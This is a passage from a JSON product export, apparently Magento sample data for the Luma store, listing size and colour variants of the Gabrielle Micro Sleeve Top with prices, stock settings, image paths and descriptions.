ll,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Green\"},\"1355\":{\"sku\":\"WS02-S-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Gabrielle Micro Sleeve Top-S-Red\",\"description\":\"<p>Luma\'s most popular top, the Gabrielle Micro Sleeve is back with even more comfort and style.<\\/p>\\n<p>&bull; Lime green v-neck tee.<br \\/>&bull; Slimming, flattering fit.<br \\/>&bull; Moisture-wicking, quick-drying, anti-microbial, and anti-odor construction.<br \\/>&bull; Longer curved hem provides additional coverage.<br \\/>&bull; 55% Hemp \\/ 45% Organic Cotton.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gabrielle-micro-sleeve-top-s-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws02-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws02-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws02-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws02-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws02-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Red\"},\"1356\":{\"sku\":\"WS02-M-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Gabrielle Micro Sleeve Top-M-Blue\",\"description\":\"<p>Luma\'s most popular top, the Gabrielle Micro Sleeve is back with even more comfort and style.<\\/p>\\n<p>&bull; Lime green v-neck tee.<br \\/>&bull; Slimming, flattering fit.<br \\/>&bull; Moisture-wicking, quick-drying, anti-microbial, and anti-odor construction.<br \\/>&bull; Longer curved hem provides additional coverage.<br \\/>&bull; 55% Hemp \\/ 45% Organic Cotton.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gabrielle-micro-sleeve-top-m-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws02-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws02-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws02-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws02-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws02-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Blue\"},\"1357\":{\"sku\":\"WS02-M-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Gabrielle Micro Sleeve Top-M-Green\",\"description\":\"<p>Luma\'s most popular top, the Gabrielle Micro Sleeve is back with even more comfort and style.<\\/p>\\n<p>&bull; Lime green v-neck tee.<br \\/>&bull; Slimming, flattering fit.<br \\/>&bull; Moisture-wicking, quick-drying, anti-microbial, and anti-odor construction.<br \\/>&bull; Longer curved hem provides additional coverage.<br \\/>&bull; 55% Hemp \\/ 45% Organic Cotton.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gabrielle-micro-sleeve-top-m-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws02-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws02-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws02-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws02-green_back.jpg\",\"image\":\"\\/w\\/s\\/ws02-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws02-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws02-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Green\"},\"1358\":{\"sku\":\"WS02-M-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Gabrielle Micro Sleeve Top-M-Red\",\"description\":\"<p>Luma\'s most popular top, the Gabrielle Micro Sleeve is back with even more comfort and style.<\\/p>\\n<p>&bull; Lime green v-neck tee.<br \\/>&bull; Slimming, flattering fit.<br \\/>&bull; Moisture-wicking, quick-drying, anti-microbial, and anti-odor construction.<br \\/>&bull; Longer curved hem provides additional coverage.<br \\/>&bull; 55% Hemp \\/ 45% Organic Cotton.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gabrielle-micro-sleeve-top-m-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws02-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws02-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws02-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws02-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws02-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Red\"},\"1359\":{\"sku\":\"WS02-L-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Gabrielle Micro Sleeve Top-L-Blue\",\"description\":\"<p>Luma\'s most popular top, the Gabrielle Micro Sleeve is back with even more comfort and style.<\\/p>\\n<p>&bull; Lime green v-neck tee.<br \\/>&bull; Slimming, flattering fit.<br \\/>&bull; Moisture-wicking, quick-drying, anti-microbial, and anti-odor construction.<br \\/>&bull; Longer curved hem provides additional coverage.<br \\/>&bull; 55% Hemp \\/ 45% Organic Cotton.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gabrielle-micro-sleeve-top-l-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws02-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws02-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws02-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws02-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws02-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Blue\"},\"1360\":{\"sku\":\"WS02-L-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Gabrielle Micro Sleeve Top-L-Green\",\"description\":\"<p>Luma\'s most popular top, the Gabrielle Micro Sleeve is back with even more comfort and style.<\\/p>\\n<p>&bull; Lime green v-neck tee.<br \\/>&bull; Slimming, flattering fit.<br \\/>&bull; Moisture-wicking, quick-drying, anti-microbial, and anti-odor construction.<br \\/>&bull; Longer curved hem provides additional coverage.<br \\/>&bull; 55% Hemp \\/ 45% Organic Cotton.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gabrielle-micro-sleeve-top-l-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws02-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws02-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws02-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws02-green_back.jpg\",\"image\":\"\\/w\\/s\\/ws02-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws02-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws02-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Green\"},\"1361\":{\"sku\":\"WS02-L-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Gabrielle Micro Sleeve Top-L-Red\",\"description\":\"<p>Luma\'s most popular top, the Gabrielle Micro Sleeve is back with even more comfort and style.<\\/p>\\n<p>&bull; Lime green v-neck tee.<br \\/>&bull; Slimming, flattering fit.<br \\/>&bull; Moisture-wicking, quick-drying, anti-microbial, and anti-odor construction.<br \\/>&bull; Longer curved hem provides additional coverage.<br \\/>&bull; 55% Hemp \\/ 45% Organic Cotton.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gabrielle-micro-sleeve-top-l-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws02-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws02-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws02-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws02-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws02-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Red\"},\"1362\":{\"sku\":\"WS02-XL-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Gabrielle Micro Sleeve Top-XL-Blue\",\"description\":\"<p>Luma\'s most popular top, the Gabrielle Micro Sleeve is back with even more comfort and style.<\\/p>\\n<p>&bull; Lime green v-neck tee.<br \\/>&bull; Slimming, flattering fit.<br \\/>&bull; Moisture-wicking, quick-drying, anti-microbial, and anti-odor construction.<br \\/>&bull; Longer curved hem provides additional coverage.<br \\/>&bull; 55% Hemp \\/ 45% Organic Cotton.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gabrielle-micro-sleeve-top-xl-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws02-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws02-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws02-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws02-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws02-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Blue\"},\"1363\":{\"sku\":\"WS02-XL-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\",\"product_websites\":\"base\",\"name\":\"Gabrielle Micro Sleeve Top-XL-Green\",\"description\":\"<p>Luma\'s most popular top, the Gabrielle Micro Sleeve is back with even more comfort and style.<\\/p>\\n<p>&bull; Lime green v-neck tee.<br \\/>&bull; Slimming, flattering fit.<br \\/>&bull; Moisture-wicking, quick-drying, anti-microbial, and anti-odor construction.<br \\/>&bull; Longer curved hem provides additional coverage.<br \\/>&bull; 55% Hemp \\/ 45% Organic Cotton.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gabrielle-micro-sleeve-top-xl-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws02-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws02-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws02-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_